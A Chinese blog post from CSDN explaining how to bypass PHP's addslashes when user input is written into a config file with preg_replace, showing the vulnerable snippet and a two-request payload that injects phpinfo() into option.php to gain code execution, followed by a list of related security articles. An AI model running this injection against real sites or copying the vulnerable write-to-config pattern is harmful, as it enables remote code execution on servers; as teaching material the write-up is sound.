php_addslashes绕过与写入文件配置getshell

最新推荐文章于 2022-03-15 17:11:38 发布
最新推荐文章于 2022-03-15 17:11:38 发布
阅读量1k 收藏 1
点赞数
分类专栏: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/awanawan/article/details/101026548
版权

绕过addslashes并写入文件配置getshell

写入配置getshell与addslashes绕过:

<?php
$str = addslashes($_GET['option']);
$file = file_get_contents('xxxxx/option.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
file_put_contents('xxxxx/option.php', $file);
?>

对option变量进行了addslashes函数的限制,但是后面使用了file_get_contents函数打开文件,中间使用preg_replace将里面原$option=\'xxx\'的内容替换成$option=\‘xxx\’,最后用file_put_contents函数进行写入。

addslashes函数

版本:php4+

这个函数是对目前字符串中的单引号,双引号,反斜杠,null这四种情况进行转义,转义方式是在原符号之前加上反斜杠

利用

访问?option=asd’;%0aphpinfo();//
$str = asd\’;%0aphpinfo();//
经过替换写入后文件为

<?php
$option='asd\';
phpinfo();//;
?>

在访问一次?option=asd
$str = asd
经过再次替换后文件为

<?php
$option='asd';
phpinfo();//;
?>

最后访问asd/option.php就可以执行了。

awanawan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpaddslashes函数与sql防注入
12-18
本文实例讲述了phpaddslashes函数与sql防注入。分享给大家供大家参考。具体分析如下: addslashes可会自动给单引号,双引号增加\\\\\\,这样我们就可以安全的把数据存入数据库中而不黑客利用,参数’a..z’界定所有大小写字母均被转义,代码如下: 复制代码 代码如下:echo addcslashes(‘foo[ ]’,’a..z’); //输出:foo[ ] $str=”is your name o’reilly?”; //定义字符串,其中包括需要转义的字符 echo addslashes($str);  //输出经过转义的字符串 定义和用法:addslashes(
addslashes deep php,addslashes()函数绕过
weixin_29799209的博客
03-28 872
前言该文章主要描述了addslashes()函数常见的编码绕过的情况2020-01-07天象独行函数addslashes()作用是返回在预定义字符之前添加反斜杠的字符串。预定义字符是单引号(')双引号(")反斜杠(\)NULL。比如下图,这样就造成了得结果是我们无法在注入的过程当中使用单引号(’)。在字符行注入的时候是比较头疼的一件事情。下面我们讨论一下一些情况可以绕过addslashes()函数...
mysql 多字节编码漏洞_PHP字符编码绕过漏洞--addslashes、mysql_real_escape漏洞
weixin_39912580的博客
02-01 189
在上次活动开发过程中,有个程序写了下面这样的语句:$sName = $_GET['name'];$sName = addslashes($sName);$sql = "SELECT COUNT(lGid) AS total FROM tbRank WHERE `sName` LIKE '%$sName%';";var_dump($sql);exit();结果扫描工具一扫描,发现问题来了,被扫除了S...
PHP字符编码绕过漏洞--addslashes、mysql_real_escape漏洞
Able
05-12 1114
$sName = $_GET['name'];  $sName = addslashes($sName);  $sql = "SELECT COUNT(lGid) AS total FROM tbRank WHERE `sName` LIKE '%$sName%';";  var_dump($sql);   exit();  结果扫描工具一扫描,发现问题来了,被扫除了SQL注入
小技巧|addslashes绕过
weixin_30906425的博客
11-26 1539
1:字符编码问题导致绕过 1.1、设置数据库字符为gbk导致宽字节注入 1.2、使用icon,mb_convert_encoding转换字符编码函数导致宽字节注入 2:编码解码导致的绕过 2.1、url解码导致绕过addslashes 2.2、base64解码导致绕过addslashes 2.3、json编码导致绕过addslashes 3:一些特殊情况导致的绕过 ...
PHPaddslashes与mysql_escape_string的区别分析
10-22
主要介绍了PHPaddslashes与mysql_escape_string的区别,简单分析了addslashes与mysql_escape_string在使用过程中的区别,具有一定参考借鉴价值,需要的朋友可以参考下
PHP中ini_set与ini_get用法实例
10-25
PHP编程中,ini_set和ini_get是两个非常重要的配置函数,它们允许开发者在脚本运行时动态地修改或获取PHP配置指令设置。这两个函数不仅简单易用,而且在实际开发中非常实用,尤其是在无法直接修改php.ini文件的...
PHP关于htmlspecialchars、strip_tags、addslashes的解释
10-25
最后,addslashes与stripslashes是一对互补的函数,通常用于数据库操作。addslashes函数的目的是在字符串中的单引号(')、双引号(")、反斜线(\)以及NUL(NULL字符)前加上反斜线(\)。这一过程称为转义,是...
php中$_GET与$_POST过滤sql注入的方法
10-25
在本主题中,我们将关注如何使用addslashes_deep函数来过滤$_GET与$_POST数据以防止SQL注入。这个函数可以递归地对数组进行处理,对数组中的每个元素使用addslashes()函数进行转义。这是一个更加深入和全面的过滤...
PHP安全过滤字符串 addslashes()与stripsashes()
weixin_34279184的博客
10-18 152
 为了数据安全,防止注入需要过滤$_POST获得的字符串,php自带了一个过滤函数addslashes()。 将名字 O'reilly 插入到数据库中,这就需要对其进行转义。大多数据库使用 \ 作为转义符:O\'reilly。 举个例子:  &lt;?php  $str="Is your name O'reilly"; echo addslashes($str);  //结果:...
php 深入理解addslashes函数
weixin_33824363的博客
10-08 154
php addslashes函数对于很多人来说并不陌生,但很大部分人只是了解皮毛,只知道addslashes函数是在特定字符前面加上反斜杠,本文章将带大家深入理解php addslashes函数的使用方法。 php addslashes函数的作用是在预定义的字符前面加上反斜杠,这些预定义字符包括: 单引号(') 双引号(") 反斜杠(\) NULL addsla...
防止sql注入-PHP防SQL注入不要再用addslashes和htmlspecialchars()和addslashes()函数
热门推荐
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
01-09 3万+
A、首先说说htmlspecialchars()和addslashes()函数吧: 在防止被注入攻击时,常会用到两个函数:htmlspecialchars()和addslashes()函数。这两个函数都是对特殊字符进行转义。 1)addslashes()作用及使用 addslashes()通常用于防止sql注入,它可对通过get,post和cookie传递过来的参数的单引号和双引号已经nul...
php addslashes() 函数
程序员哆啦A梦,蓝胖子
05-02 1005
实例 在每个双引号(")前添加反斜杠: <?php $str = addslashes('ggg is the "dada" city in China.'); echo($str); ?> addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 单引号(’) 双引号(") 反斜杠(\) NULL 可用于为存储在数据库中的字符串以及数据库查询语句准备字符串 GET、P...
php写入配置文件getshell,php_addslashes绕过写入文件配置getshell
weixin_32829465的博客
03-17 178
绕过addslashes写入文件配置getshell写入配置getshelladdslashes绕过:$str = addslashes($_GET['option']);$file = file_get_contents('xxxxx/option.php');$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $fi...
file_put_contents以及file_get_contents的用法与在使用过程中遇到的问题(PHP学习)
weixin_30341735的博客
08-17 237
对数据的操作最基本的是增删改查,file_put_contents以及file_get_contents是对文件里的数据进行存入与取出。 先上代码: <?php $str = 'hello world'; if(file_put_contents('01.txt',$str)){ echo '数据存入成功','<br />'; }else{ echo ...
php写入配置文件getshell,代码审计之配置文件写入导致Getshell实例分析
weixin_39566773的博客
03-17 113
*本文原创作者:davichi8282,本文属FreeBuf原创奖励计划,未经许可禁止转载0×00概述近期审计HadSky5.5.2.20180525最新版的时候发现配置文件写入导致的代码执行问题,刚开始审计的时候发现这套cms功能点真的很少,而且使用框架过滤的方式,传统注入xss问题很难发现,还有以往在审计cms安装时候是否存在配置文件任意写入问题的时候我是直接全局搜索是否存在install.l...
php函数禁用绕过的原理与利用
蚁景网安学院
12-25 770
是否遇到过费劲九牛二虎之力拿了webshell却发现连个scandir都执行不了?拿了webshell确实是一件很欢乐的事情,但有时候却仅仅只是一个小阶段的结束;本文将会以webshell作为起点从头到尾来归纳bypass disable function的各种姿势。
sql注入绕过addslashes函数-宽字节注入
G208_522的博客
03-15 4670
宽字节注入 宽字节注入要求: 1、数据库的编码为GBK 2、addslashes()函数,检测在单引号前加\ addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 预定义字符是: 单引号(’) 双引号(") 反斜杠(\) NULL 一、单引号探测 http://localhost:8899/sqli-lab/Less-33/index.php?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为G
PHP文件上传漏洞:00截断绕过与Webshell利用
本章节主要讲解的是关于Web应用程序中的文件上传漏洞,特别是如何通过绕过白名单验证实现恶意文件上传——00截断绕过技术。在Web开发中,为了防止恶意用户上传不安全或不符合预期类型的文件,通常会实施白名单策略,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值